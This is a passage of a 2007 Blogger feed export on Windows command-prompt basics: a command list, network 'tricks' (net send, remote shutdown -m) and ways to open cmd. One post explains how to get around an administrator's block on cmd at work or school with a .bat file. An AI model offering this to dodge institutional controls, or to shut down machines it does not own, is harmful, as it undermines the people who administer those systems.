Moves one or more files from one directory to another directory.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; PATH&lt;/span&gt;     Displays or sets a search path for executable files.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; PAUSE&lt;/span&gt;    Suspends processing of a batch file and displays a message.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; POPD&lt;/span&gt;     Restores the previous value of the current directory saved by PUSHD.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; PRINT&lt;/span&gt;    Prints a text file.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; PROMPT&lt;/span&gt;   Changes the Windows command prompt.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; PUSHD&lt;/span&gt;    Saves the current directory then changes it.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; RD&lt;/span&gt;       Removes a directory.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; RECOVER&lt;/span&gt;  Recovers readable information from a bad or defective disk.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; REM&lt;/span&gt;      Records comments (remarks) in batch files or CONFIG.SYS.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; REN&lt;/span&gt;      Renames a file or files.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; RENAME&lt;/span&gt;   Renames a file or files.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; REPLACE&lt;/span&gt;  Replaces files.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; RMDIR&lt;/span&gt;    Removes a directory.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; SET&lt;/span&gt;      Displays, sets, or removes Windows environment variables.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; SETLOCAL&lt;/span&gt; Begins localization of environment changes in a batch file.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; SHIFT&lt;/span&gt;    Shifts the position of replaceable parameters in batch files.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; SORT&lt;/span&gt;     Sorts input.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; START&lt;/span&gt;    Starts a separate window to run a specified program or command.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; SUBST&lt;/span&gt;    Associates a path with a drive letter.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; TIME&lt;/span&gt;     Displays or sets the system time.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; TITLE&lt;/span&gt;    Sets the window title for a CMD.EXE session.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; TREE&lt;/span&gt;     Graphically displays the directory structure of a drive or path.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; TYPE&lt;/span&gt;     Displays the contents of a text file.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; VER&lt;/span&gt;      Displays the Windows version.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; VERIFY&lt;/span&gt;   Tells Windows whether to verify that your files are written&lt;br /&gt;         correctly to a disk.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; VOL&lt;/span&gt;      Displays a disk volume label and serial number.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; XCOPY&lt;/span&gt;    Copies files and directory trees&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/706833174719513528-3248918859170203112?l=windowscommandprompt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://windowscommandprompt.blogspot.com/feeds/3248918859170203112/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=706833174719513528&amp;postID=3248918859170203112' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/706833174719513528/posts/default/3248918859170203112'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/706833174719513528/posts/default/3248918859170203112'/><link rel='alternate' type='text/html' href='http://windowscommandprompt.blogspot.com/2007/12/all-commands-advanced.html' title='All commands (advanced)'/><author><name>Dannz</name><uri>http://www.blogger.com/profile/10760366497224672983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-706833174719513528.post-4421764222103095125</id><published>2007-12-08T02:13:00.000-08:00</published><updated>2007-12-08T03:38:36.931-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bat'/><category scheme='http://www.blogger.com/atom/ns#' term='batch'/><category scheme='http://www.blogger.com/atom/ns#' term='network'/><category scheme='http://www.blogger.com/atom/ns#' term='dannz'/><category scheme='http://www.blogger.com/atom/ns#' term='cmd'/><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><category scheme='http://www.blogger.com/atom/ns#' term='prompt'/><category scheme='http://www.blogger.com/atom/ns#' term='cmd prompt'/><category scheme='http://www.blogger.com/atom/ns#' term='matrix'/><category scheme='http://www.blogger.com/atom/ns#' term='echo'/><category scheme='http://www.blogger.com/atom/ns#' term='.bat'/><category scheme='http://www.blogger.com/atom/ns#' term='vista'/><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='command'/><category scheme='http://www.blogger.com/atom/ns#' term='shutdown'/><category scheme='http://www.blogger.com/atom/ns#' term='command prompt'/><title type='text'>Network tricks (intermediate)</title><content type='html'>&lt;span style="font-weight: bold;"&gt;net view&lt;/span&gt;&lt;br /&gt;Typing this shows all of the computers' names in your network/domain&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;net send (computer name) (message)&lt;/span&gt;&lt;br /&gt;Typing this will send a message to any computer you type in. ex. net send User hello&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;net send * (message)&lt;/span&gt;&lt;br /&gt;Typing this will send a message to all computers in your domain or network that are online. ex. net send * hello&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;net send /domain (message)&lt;/span&gt;&lt;br /&gt;This does the exact same thing as the above, it sends a message to all computers in your domain or network. ex. net send /domain hello&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;net send (ip address) (message)&lt;/span&gt;&lt;br /&gt;This supposobly sends a message to the computers ip you type in, (if this works please tell me) ex. net send 16.21.36.2 hello&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;shutdown -i&lt;/span&gt;&lt;br /&gt;This allows you to shutdown any computer in your domain/ network remotly.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;shutdown -m \\(computer name)&lt;/span&gt;&lt;br /&gt;This is the same thing as the above it just is quicker. ex. shutdown -m \\user&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;ipconfig &lt;/span&gt;&lt;br /&gt;Shows your internal IP address e.g. 192.168.2.1&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/706833174719513528-4421764222103095125?l=windowscommandprompt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://windowscommandprompt.blogspot.com/feeds/4421764222103095125/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=706833174719513528&amp;postID=4421764222103095125' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/706833174719513528/posts/default/4421764222103095125'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/706833174719513528/posts/default/4421764222103095125'/><link rel='alternate' type='text/html' href='http://windowscommandprompt.blogspot.com/2007/12/network-tricks-intermediate.html' title='Network tricks (intermediate)'/><author><name>Dannz</name><uri>http://www.blogger.com/profile/10760366497224672983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-706833174719513528.post-7561953725387995334</id><published>2007-12-08T01:49:00.000-08:00</published><updated>2007-12-08T03:38:36.934-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bat'/><category scheme='http://www.blogger.com/atom/ns#' term='batch'/><category scheme='http://www.blogger.com/atom/ns#' term='network'/><category scheme='http://www.blogger.com/atom/ns#' term='dannz'/><category scheme='http://www.blogger.com/atom/ns#' term='open'/><category scheme='http://www.blogger.com/atom/ns#' term='cmd'/><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><category scheme='http://www.blogger.com/atom/ns#' term='prompt'/><category scheme='http://www.blogger.com/atom/ns#' term='notepad'/><category scheme='http://www.blogger.com/atom/ns#' term='cmd prompt'/><category scheme='http://www.blogger.com/atom/ns#' term='matrix'/><category scheme='http://www.blogger.com/atom/ns#' term='echo'/><category scheme='http://www.blogger.com/atom/ns#' term='.bat'/><category scheme='http://www.blogger.com/atom/ns#' term='vista'/><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='command'/><category scheme='http://www.blogger.com/atom/ns#' term='shutdown'/><category scheme='http://www.blogger.com/atom/ns#' term='command prompt'/><title type='text'>Opening the cmd console (basic)</title><content type='html'>There are multiple ways to open the cmd console ;&lt;br /&gt;&lt;br /&gt;- Open run ( Windows key + R ) and type cmd&lt;br /&gt;&lt;br /&gt;- Open start &gt; all programs &gt; accessories &gt; Command prompt&lt;br /&gt;&lt;br /&gt;If the two above operations are blocked try (e.g. at work or school) ;&lt;br /&gt;&lt;br /&gt;- Open notepad (right click &gt; new text document and open it), type cmd.exe and then save it as 'cmd.bat' (without the quotes) and then open that&lt;br /&gt;&lt;br /&gt;If these techniques are all blocked you have to give some credit to your administrator, as most technicians cannot do this. Of course, if this is at home and you are the sole owner of your computer, unblock the cmd.exe&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/706833174719513528-7561953725387995334?l=windowscommandprompt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://windowscommandprompt.blogspot.com/feeds/7561953725387995334/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=706833174719513528&amp;postID=7561953725387995334' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/706833174719513528/posts/default/7561953725387995334'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/706833174719513528/posts/default/7561953725387995334'/><link rel='alternate' type='text/html' href='http://windowscommandprompt.blogspot.com/2007/12/opening-cmd-console-basic.html' title='Opening the cmd console (basic)'/><author><name>Dannz</name><uri>http://www.blogger.com/profile/10760366497224672983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
